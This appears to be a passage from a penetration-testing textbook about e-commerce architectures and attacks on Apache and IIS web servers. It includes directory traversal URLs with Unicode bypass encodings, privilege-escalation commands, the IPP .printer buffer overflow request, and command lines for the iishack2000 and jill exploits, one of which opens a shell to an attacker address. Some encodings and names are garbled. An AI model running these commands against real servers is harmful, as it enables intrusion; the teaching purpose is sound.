E-Commerce Architecture

A company that provides e-commerce services can be structured in one of two ways:

• Single-server architecture

• Tiered architecture

The single-server architecture is found with smaller websites. In this configuration, all web servers are housed on a single server. Often, more than one client is found on the same server. This presents a high risk because if one component of the server is breached, all the clients on the server are breached.

As a penetration tester, you will probably not work much with single-server e-commerce sites. If a company can afford to hire a penetration tester and is that concerned with the security of its website, it probably has the money to invest in a tiered architecture.

In a tiered architecture, the web services are separated across multiple hosts and are often redundant to provide for high availability. You can deploy this in several ways, but Figure 7-11 presents a common one.

Having an understanding of how web languages and e-commerce architectures work, you are ready to learn about specific vulnerabilities and exploits. Apache and IIS, the two most common web servers, are introduced in the sections that follow.

Apache HTTP Server Vulnerabilities

The Apache HTTP Server is developed under the direction of the Apache Software Foundation (ASF), a nonprofit organization conceived as the Apache Group in 1995. According to a 2004 Netcraft survey, 67 percent of all websites are running Apache.

Apache is not as vulnerable as IIS. Most of the vulnerabilities on Apache HTTP Server occur in the Windows port of this popular web server, but this port is not as prevalent on the Internet as the original UNIX/Linux version.

New vulnerabilities are discovered all the time. By the time this book comes to press, new vulnerabilities will most likely have been found. Most of the vulnerabilities are related to denial-of-service (DoS) attacks. To read about Apache vulnerabilities, check out the online publication Apache Week, which contains a database of all known vulnerabilities with the Apache web server.

The following are some of the popular attacks against Apache web servers:

• Memory consumption DoS An attacker could send an HTTP GET request with a MIME header containing multiple lines with numerous space characters that would crash a server.

• SSL infinite loop An attacker could cause a DoS attack by aborting an SSL connection and causing a child process to enter an infinite loop.

• Basic authentication bypass An attacker could gain access to restricted resources even though he has not authenticated to the server. This is only found in Apache 2.0.51 and is because of a flaw in the code that prevents the merging of the Satisfy directive. The Satisfy directive grants users access to a server with a username and password or client IP address.

• IPv6 URI parsing heap overflow Using the HTTP test tools created by Codenomicon, a leading provider of automated software testing tools, a malicious attacker could crash a server when an input validation error occurs in the Apache portable runtime library.

IIS Web Server

Microsoft continues to go to great strides to secure their web platform. Each version of IIS is more secure than the previous, and their current version leaves little excuse for websites to not be protected. Nevertheless, each version increases in complexity and therefore the chances for a server to go unpatched and not secure.

IIS is more than just a single web server. It encompasses many services, including these:

• FTP Service

• NNTP Service

• Internet Printing Protocol (IPP)

• SMTP Service

• BITS (used for Windows updates)

• Internet Information Services Manager

• FrontPage 2002 Server Extensions

• WWW Services

The last item on the list, WWW Services, includes the following:

• Active Server Pages

• Server side includes

• Webdav publishing

• WWW service

• Internet data connector (IDC)

• Remote desktop web connection

• Remote administration

As with all servers, you should turn off unneeded services. The authors have breached many websites during penetration tests because a webmaster left services like the remote administration or the IPP running even though the company was not using them. Because they were not used, they were left to their default settings, which opened them up for attacks.

A few of the more popular attacks against IIS include the following:

• Showcode.asp

• Privilege execution

• Buffer overflows

Showcode.asp

Showcode.asp allows developers to view the code of a script on a server without executing it. It is included in the Microsoft Data Access Components (MDAC) and is located at c:\Program Files\Common Files\SYSTEM\MSADC. With some manipulation of the URL, you could view the code of other files on a server. This would make it easier for a malicious attacker to reverse engineer a program and look for flaws to exploit to gain further access.

To execute the showcode.asp script, append after the showcode.asp file a question mark (?) and the name of the file you want to view.

You can combine this with directory traversal techniques to view files outside of the present working directory where the file is located. For example, to view a file named secretfile.txt at the root of the server partition, enter the following URL:

http://www.hackmynetwork.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../secretfile.txt

The periods and backslashes (/../) are used for traversing the file system. Many servers are protected against this simple form of directory traversal. However, you can use the Unicode representation of backslashes to perform directory traversal. For example, you can use %c0%af, %c0%9v, and %c1%1c as ways to get around servers that are protected against directory traversal. The preceding URL, then, would look like this:

http://www.hackmynetwork.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/ Samples/..%c0%9v..%c1%c1..%c0%af..%c0%9v../secretfile.txt

You also can accomplish directory traversal techniques by using such automated tools as IIS Xploit and ExecIIS. Again, combining the showcode.asp with directory traversal can reveal the code of many files, which a malicious hacker can then use to further exploit a system.

Because directory traversal relies on a default installation with IIS on the same volume as the system partition, you should always install the web root on a different volume. If the website is on the D: partition, for example, you cannot traverse the directory to get to the system root in C:\windows\system32.

Privilege Escalation

Another common attack is performing privilege escalation. Privilege escalation is the process of gaining an unauthorized level of access on a server. Normally, IIS tries to prevent processes from running with SYSTEM privileges because this level has the most access on a server. However, IIS has flaws that allow a malicious hacker to gain access and run programs with SYSTEM-level privileges. With SYSTEM-level access, the attacker can perform such tasks as adding users to a server or using .NET commands to gain access to other servers.

You can perform privilege escalation in several ways, such as the following:

perl unicodeloader 192.168.1.1:80 'c:\inetput\wwwroot\hackmynetwork

http://www.hackmynetwork.com/upload.asp

http://www.hackmynework.com/scripts/idq.dll

Buffer Overflows

Computers contain temporary storage areas called buffers to hold information while a program is running. Figure 7-12 illustrates the format of a typical memory buffer. Included in the buffer is an extended instruction pointer (EIP) that indicates what code the program should execute after reading the information in the buffer. A malicious attacker can overwrite the buffer and the return pointer with a new pointer, sending the program to execute code of the attacker's choice. Figure 7-13 diagrams how the new pointer directs the program to execute malicious code.

You can run numerous buffer overflow exploit utilities against IIS. Many of these software utilities use the IPP printer buffer overflow vulnerability, which was introduced in IIS 5 on Windows 2000 Server and discovered by Riley Hassell from eEye Digital Security.

IIS 5.0 allows for remote access to printers using HTTP. The msw3prt.dll provides support for the IPP and allows access to printer files that represent networked printers. The IPP service is susceptible to a buffer overflow attack because it sends 420 bytes to the server with the following GET request:

GET /NULL.printer HTTP/1.0 HOST:[420 byte buffer]

Several tools utilize this exploit technique. The most popular of these include the original iishack200.c (eEye) and jill.c (Dark spyrit). Both of these send buffer overflows and give the attacker a command shell where he can execute further commands.

To run iishack2000.c against a web server with the IP address of 192.168.1.1 and running service pack 1, type the following from a Windows command prompt:

iishack2000 192.168.1.1 80 1

You can run jill.c from a UNIX-based machine or from Windows (assuming you also have cygwin1.dll on your system to intercept the command and run it natively within Windows). To run the jill.c exploit against the same server, type the following:

jill 192.168.1.1 80 192.168.1.2 1024

Here, 192.168.1.2 represents the IP address of the attacker and 1024 is his source port.

If you want to run jill.c on Windows, look at iis5hack.zip from Cyrus the Great. It is still the same exploit, but it is designed specifically for the Windows platform.